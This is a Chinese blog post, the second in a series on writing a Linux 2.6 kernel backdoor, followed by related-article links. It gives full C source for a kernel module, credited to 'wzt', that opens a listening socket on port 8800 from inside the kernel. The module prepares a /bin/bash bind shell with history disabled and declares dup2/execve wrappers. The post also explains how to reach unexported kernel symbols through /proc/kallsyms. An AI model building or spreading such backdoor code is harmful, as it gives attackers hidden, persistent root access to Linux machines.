书写 2.6 内核后门程序 -2 (调用内核程序)

最新推荐文章于 2022-06-30 10:10:55 发布
最新推荐文章于 2022-06-30 10:10:55 发布
阅读量747 收藏 2
点赞数
分类专栏: linux 编程 内核与驱动

   在内核态通过int 0x80调用系统内核函数,虽然方便但是效率比较低。可以尝试直接调用内核函数,在wzt的原文中直接调用 sys_bind,sys_socket  等函数的实现,

比如 sys_bind 函数

SYSCALL_DEFINE3(bind, int, fd, struct sockaddr __user *, umyaddr, int, addrlen)
{
        struct socket *sock;
        struct sockaddr_storage address;
        int err, fput_needed;

        sock = sockfd_lookup_light(fd, &err, &fput_needed);
        if (sock) {
                err = move_addr_to_kernel(umyaddr, addrlen, (struct sockaddr *)&address);
                if (err >= 0) {
                        err = security_socket_bind(sock,
                                                   (struct sockaddr *)&address,
                                                   addrlen);
                        if (!err)
                                err = sock->ops->bind(sock,
                                                      (struct sockaddr *)
                                                      &address, addrlen);
                }
                fput_light(sock->file, fput_needed);
        }
        return err;
}

那么就调用 

security_socket_bind   sock->ops->bind

但是在内核中 调用 security_socket_bind 编译是会遇到warning:

WARNING: "security_socket_bind" [/home/sina/Debug/network/network-shell1/net.ko] undefined!
并且在加载内核时会提示:


在内核模块中有 MODULE_LICENSE 语句。

察看内核发现没有对内核符号 security_socket_bind  调用 EXPORT_SYMBOL,在 /proc/kallsyms 发现也有这个符号:

|

对于这种情况何以使用函数指针,查找/proc/kallsyms 文件来找到相应的函数。这个在

http://blog.csdn.net/gudujianjsk/article/details/7948423

所附录代码中已经实现。


分析内核源码有EXPORT_SYMBOL的 内核符号:kernel_bind.

int kernel_bind(struct socket *sock, struct sockaddr *addr, int addrlen)
{
        return sock->ops->bind(sock, addr, addrlen);
}
EXPORT_SYMBOL(kernel_bind);


源码如下:

/*
* kenel mode socket door v0.1
*
* by wzt http://www.xsec.org
*/

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>

#include "syscalls.h"

#define port    8800
#define LEN     256

#define SGID            0x489196ab
#define HOME            "/"

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
    "TERM=linux",
    "HOME=" HOME,
    "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
    ":/usr/local/sbin",
    "HISTFILE=/dev/null",
     NULL };

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);
static inline my_syscall3(int, execve, const char *, filename,const char **, argv, const char **, envp);

struct socket *sock_alloc(void);

int sys_setuid(uid_t  uid);
asmlinkage ssize_t  sys_read(unsigned int fd, char __user * buf, size_t count); 

int k_listen(void)
{
        struct socket *sock,*newsock;
        struct sockaddr_in server;
    	struct sockaddr client[128];
   	char address[128];
    	int sockfd, sockid, i,size = 0;
        int error = 0,len = sizeof(struct sockaddr);
        
        
        error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
        if (error < 0) {
                printk("[-] socket_create failed: %d\n",error);
                sock_release(sock);
                return -1;
        }
    
    	sockfd = sock_map_fd(sock,0);
    	if (sockfd < 0) {
       		printk("[-] sock_map_fd() failed.\n");
        	sock_release(sock);
        	return -1;
    	}        

    	for (i = 0; i < 8; i++)
       		server.sin_zero[i] = 0;

    	server.sin_family = PF_INET;
    	server.sin_addr.s_addr = INADDR_ANY;
    	server.sin_port = htons(port);
	
	error = kernel_bind(sock, (struct sockaddr *)&server,len);
	if(error < 0)
	{
		printk("error bind!\n");
		sock_release(sock);
		return 0;
	}

	error = kernel_listen(sock, 5);
    	if (error < 0) {
        	printk("[-] unix_listen failed.\n");
        	sock_release(sock);
        	return -1;
    	}
    	printk("[+] listen port %d ok.\n",port);

	kernel_accept(sock,&newsock,sock->file->f_flags);
        
      	sockid = sock_map_fd(newsock,0);
       	if (sockid < 0) {
        	printk("[-] sock_map_fd() failed.\n");
            	sock_release(newsock);
        	return -1;
       	}
	//sys_read(sockid,&ch,1);		
    		

        return 1;
    
    	out_release:
    	sock_release(sock);
    	sock_release(newsock);

    	return 0;
}

int k_socket_init(void)
{
        printk("[+] kernel socket test start.\n");
        
        k_listen();
}

void k_socket_exit(void)
{
        printk("[+] kernel socket test over.\n");
}

module_init(k_socket_init);
module_exit(k_socket_exit);

MODULE_LICENSE("Dual BSD/GPL");
MODULE_AUTHOR("wzt");


sys_read   sys_write等函数可以通过查找 /proc/kallsyms 来找到地址。










gudujianjsk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux内核后门的原理及简单实战应用(转)
csd3176的博客
08-10 146
Linux内核后门的原理及简单实战应用(转)[@more@]   以下代码均在linux i86 2.0.x的内核下面测试通过。它也许可以在之前的版本通过,但并没有被测试过。因为从2.1.x内核版本就引入了相当大的改变,显著...
linux kernel socket实例分析
SweeNeil
09-19 882
代码转自:http://blog.chinaunix.net/uid-26748923-id-3548615.html #include <asm/atomic.h> #include <asm/checksum.h> #include <asm/unaligned.h> #include <linux/module.h> #include &...
Linux Kernel 2.6.9源码分析 -- bind
猿来如此yXy
01-30 250
Linux Kernel 2.6.9源码分析 – bind 先来看下bind API的原型: int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen); 参数说明: sockfd:即socket描述字,它是通过socket()函数创建了,唯一标识一个socket。bind()函数就是将给这个描述字绑定一个名字。 add...
内核UDP隧道框架
redwingz的博客
10-29 3970
目前内核支持的基于UDP隧道的协议有L2TP、IPSec、FOU/GUE、GENEVE和VXLAN等。内核为这些隧道协议提供了一个通用的UDP隧道框架,参见文件net/ipv4/udp_tunnel.c,共性的一些操作统一到了框架中。 隧道创建 对于隧道L2TP、FOU/GUE、GENEVE和VXLAN,隧道创建时,都需要在内核中新建一个UDP套接口,框架中的函数udp_sock_creat...
kernel_socket 和 应用socket通讯
guoggn的专栏
06-20 1164
kernel创建TCP的socket 并创建接受线程
linux提权工具利用2.6内核漏洞
12-27
3. **payload**:exploit成功后,通常会执行一个payload,这可以是一个脚本或二进制程序,用于维持高权限状态并执行进一步的恶意操作,比如安装后门或窃取数据。 4. **安全检测与规避**:为了提高成功率,提权工具...
Linux2.6系统调用钩子的原理分析和实现应用.pdf
09-06
本文将深入探讨系统调用钩子的原理,以及如何在Linux 2.6内核中实现这一功能。 系统调用是用户空间程序内核交互的主要方式。当用户程序调用一个标准C库函数(如`fork()`)时,会触发一个系统调用,如`int 0x80`。...
基于Linux2.6的进程隐藏机制的实现.pdf
09-06
Linux2.6内核提供了丰富的功能来管理和控制进程,包括进程创建、调度、通信以及资源分配等。然而,这种强大的功能也为恶意软件和黑客提供了潜在的攻击点,他们可能利用内核模块(LKMs)创建难以检测的后门,以隐藏其...
Rootkit on Linux v2.6
07-28
- **内核空间Rootkit**:这类rootkit在内核空间运行,通过修改内核结构、拦截系统调用等手段实现对系统的深度控制。 #### Rootkit常见功能 内核空间的rootkit通常具备以下功能: - **隐藏进程**:使某些进程不被...
Rootkit_on_Linux_x86_v2.6.pdf
08-18
它们通常通过修改操作系统的一部分或作为驱动程序内核模块安装来实现这一目的。根工具包可以分为用户空间(UserSpace)和内核空间(KernelSpace)两种类型。 #### 用户空间根工具包 用户空间的根工具包运行在用户...
Linux内核态和用户态的socket编程
成长笔记
05-11 3051
Linux socket编程(内核态)
Linux 内核态 Socket 编程
热门推荐
无为而无不为
11-27 1万+
1.内核态 socket API 内核态socket编程的过程和用户态下的socket编程流程一样,但是接口不同。Kernel提供了一组内核态的socket API,基本上在用户态的sockt API在内核中都有对应的API。 在net/socket.c中可以看到如下导出符号: EXPORT_SYMBOL(kernel_sendmsg); EXPORT_SYMBOL(kernel_recv
关于4.x内核内核态socket编程问题(sock_create_kern)
whshiyun的专栏
08-24 4460
关于4.x内核内核态socket编程问题(sock_create_kern) tags : linux socket linux内核态socket编程如何实现:(以tcp服务端举例) 1、sock_create_kern() 2、kernel_setsockopt()这一步为可去掉的,但是如果想socket进行配置,则需要此步骤,例如配置成非阻塞模式: struct tim...
书写 2.6 内核后门程序 -1 (软中断int 0x80)
gudujianjsk的专栏
10-30 1133
Unix世界中一切皆文件的思想将socket通信变的简单的多, 通常我们直接可以用read,write等api函数作为socket通信的方法,这些api函数最终都会调用kernel提供的sys_XXX系列函数。平时用到的read等函数早以在c库中封装好了。其实我们可以自己直接向系统发送软中断int 0x80来执行sys_read函数,如: int my_read(int fd, ch
Linux信号机制及其原理分析
qq_34231329的博客
06-30 1393
在最近在工作中,使用到了信号的相关知识,之前我们在分析系统进程的时候也提到了信号,但并没有对信号这个机制做出深入的理解,借此机会,我们深入分析一下信号机制是怎样实现的信号(),是系统中的一种古老的进程间通信机制,而作为类系统,早期也是模仿了系统,自然也保留下了这个机制。信号是一种异步通信机制,它是在软件层面上对中断机制的一种模拟注:本篇文章基于glibc版本2.35,Linux内核版本5.17,x86_64架构信号可以由内核产生,也可以由用户产生,这边举几个例子:用户在终端输入时,会产生一个信号在程序中对一
syscall的原理
clh01s的博客
12-27 1064
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-arm/...
Kernel中rfcomm层的初始化
923723914
09-10 298
篇文章《kernel中bluetooth的初始化》一文中晓东和大家分享了HCI层,L2CAP层以及SCO层的初始化流程,今天晓东继续和大家一起来看rfcomm层的初始化流程。 在正式开始之前,我们先来看一下rfcomm层是什么,百度百科是这样介绍rfcomm的:“一个基于欧洲电信标准协会ETSI07.10规程的串行线性仿真协议。此协议提供RS232控制和状态信号,如基带上的损坏,CTS以及...
linux kernel 三次握手建立TCP链接的实现
ARM-Linux
11-17 615
1. 应用层 1.1 server socket() -> bind() -> listen() -> accept() -> recv() & send() 1.2 client socket() -> connect() -> send() & recv() 1.3 三次握手建立连接 (1) 客户端发送一个 SYN 段(SYN 标志位置位),包含初始序号 ISN,在图中,这个序号的值 seq = 2379453...
Linux设备驱动程序中文第三版-2.6内核详解
驱动程序不仅要实现硬件操作的低级函数,还要提供高级接口供用户空间的应用程序调用。此外,内核的模块化设计使得驱动可以动态加载和卸载,增强了系统的灵活性。 在Linux 2.6内核中,引入了许多改进和新特性,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值